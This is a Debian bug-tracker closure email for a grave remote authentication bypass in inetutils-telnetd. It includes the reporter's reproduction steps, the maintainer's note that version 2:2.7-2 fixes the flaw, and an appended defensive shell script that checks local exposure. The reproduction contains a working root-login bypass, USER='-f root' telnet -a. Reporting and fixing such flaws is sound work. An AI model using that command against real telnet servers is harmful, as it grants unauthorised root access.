Your message dated Wed, 21 Jan 2026 14:36:01 +0100
with message-id <[email protected]>
and subject line Re: Bug#1126047: inetutils-telnetd: remote authentication bypass
has caused the Debian Bug report #1126047,
regarding inetutils-telnetd: remote authentication bypass
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
1126047: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126047
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: inetutils-telnetd
Version: 2:2.7-1
Severity: grave
Justification: user security hole

From

   https://seclists.org/oss-sec/2026/q1/89


root@kaka:~ sudo apt-get install inetutils-telnetd telnet
root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf 
root@kaka:~ sudo /etc/init.d/inetutils-inetd start
root@kaka:~ USER='-f root' telnet -a localhost
...
root@kaka:~#

-- System Information:
Debian Release: forky/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 6.17.13+deb14-amd64 (SMP w/12 CPU threads; PREEMPT)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8), LANGUAGE=en_CA:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages inetutils-telnetd depends on:
pn  inetutils-inetd | inet-superserver  <none>
ii  libc6                               2.42-9
ii  libcom-err2                         1.47.2-3+b8
ii  libk5crypto3                        1.22.1-2
ii  libkrb5-3                           1.22.1-2
ii  libtinfo6                           6.6+20251231-1
ii  login                               1:4.16.0-2+really2.41.3-2
ii  netbase                             6.5
ii  systemd-sysv                        259-1

inetutils-telnetd recommends no packages.

inetutils-telnetd suggests no packages.

--- End Message ---
--- Begin Message ---
Version: 2:2.7-2

On Wed, 2026-01-21 at 07:36:57 +0900, David Bremner wrote:
> Package: inetutils-telnetd
> Version: 2:2.7-1
> Severity: grave
> Justification: user security hole

> From
> 
>    https://seclists.org/oss-sec/2026/q1/89
> 
> 
> root@kaka:~ sudo apt-get install inetutils-telnetd telnet
> root@kaka:~ sudo sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf 
> root@kaka:~ sudo /etc/init.d/inetutils-inetd start
> root@kaka:~ USER='-f root' telnet -a localhost
> ...
> root@kaka:~#

Right, was meaning to file a report to track this, thanks for doing that!

This was fixed yesterday with this upload:

,--
inetutils (2:2.7-2) unstable; urgency=medium

  * Fix remote authentication by-pass in telnetd.
    GNU InetUtils Security Advisory:
    <https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html>
  * Switch to Standards-Version 4.7.3 (no changes needed).

 -- Guillem Jover <[email protected]>  Tue, 20 Jan 2026 15:53:22 +0100
`---

I need to discuss with the security team how to proceed.

Thanks,
Guillem

--- End Message ---
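
A local exposure check for the issue tracked in this thread, added here as an example; it is not part of the bug report or of the Debian packaging. It assumes Debian unstable, where the changelog quoted above gives 2:2.7-2 as the fixed upload, and a telnetd started from /etc/inetd.conf as in the report. The function names are hypothetical, and fixed versions for other suites are not stated in this thread.

```shell
#!/bin/sh
# Added example: is a pre-fix inetutils-telnetd reachable through inetd on this host?
# Assumption: only /etc/inetd.conf style configuration is checked (as in the report);
# other ways of starting telnetd are not covered.

FIXED_VERSION='2:2.7-2'   # from the changelog quoted in the thread (unstable upload)

# Exit 0 if CONF has an active telnet entry. Entries disabled by the Debian
# tooling start with "#<off>#" and are skipped like any other comment line.
telnet_enabled() {
    [ -r "$1" ] || return 1
    awk '!/^[ \t]*#/ && ($1 == "telnet" || $1 ~ /:telnet$/) { on = 1 } END { exit !on }' "$1"
}

# Print the installed inetutils-telnetd version, or nothing if it is not installed.
installed_version() {
    command -v dpkg-query >/dev/null 2>&1 || return 0
    dpkg-query -W -f='${db:Status-Abbrev} ${Version}\n' inetutils-telnetd 2>/dev/null |
        awk '$1 ~ /^.i/ { print $2 }'
}

# Combine both checks. Returns 1 only when a pre-fix package is enabled in CONF.
assess() {
    conf=${1:-/etc/inetd.conf}
    ver=$(installed_version)
    if [ -z "$ver" ]; then
        echo "inetutils-telnetd is not installed"; return 0
    fi
    if dpkg --compare-versions "$ver" ge "$FIXED_VERSION"; then
        echo "inetutils-telnetd $ver is at or above $FIXED_VERSION"
        return 0
    fi
    if telnet_enabled "$conf"; then
        echo "EXPOSED: inetutils-telnetd $ver predates $FIXED_VERSION and telnet is enabled in $conf"
        return 1
    fi
    echo "inetutils-telnetd $ver predates $FIXED_VERSION; telnet is not enabled in $conf"
}

assess "$@"
```

Run it as root or any user that can read /etc/inetd.conf; a non-zero exit status means the package should be upgraded or the telnet entry disabled.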
